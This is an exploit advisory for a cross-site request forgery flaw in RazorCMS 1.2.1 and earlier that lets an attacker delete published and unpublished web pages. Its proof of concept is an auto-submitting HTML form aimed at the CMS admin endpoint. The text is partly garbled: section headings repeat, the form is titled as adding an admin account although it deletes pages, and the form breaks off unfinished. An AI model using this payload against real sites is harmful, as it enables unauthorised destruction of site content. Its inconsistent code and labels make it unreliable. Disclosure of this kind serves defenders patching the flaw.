# Exploit Title : RazorCMS <= 1.2.1 STABLE CSRF (Delete Web Pages)
# Date: 08-03-2012
# Author: Ivano Binetti (http://www,ivanobinetti.com)
# Software link : http://www.razorcms.co.uk/archive/core/razorCMS_core_v1_2_1_STABLE.zip
# Vendor site : http://www.razorcms.co.uk/
# Version : 1.2.1 STABLE and lower
# Tested on : Debian Squeeze (6.0)
2)Vulnerabilities Description
3)Exploit (Delete Web Page)
"razorCMS is ideally suited to small to medium website projects, it can be run without need for a database, due to it's flat file
structure it has no need for a database meaning it can also be a cost effected method in content management, allowing it to be
used on the cheapest of web hosts, or even free hosting".
2)Vulnerabilities Description
RazorCMS 1.2.1 STABLE (and lower)is affected by CSRF Vulnerability which allows an attacker to delete web pages, both published
and unpublished.
3)Exploit (Delete Web Page)
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to add ADMIN account</H2>
<form method="POST" name="form0" action="http://<razorcms_ip>:80/razorcms/admin/?action=showcats&unpub=true&slabID=2&catname=sidebar">
In this POC I've deleted web page with ID=2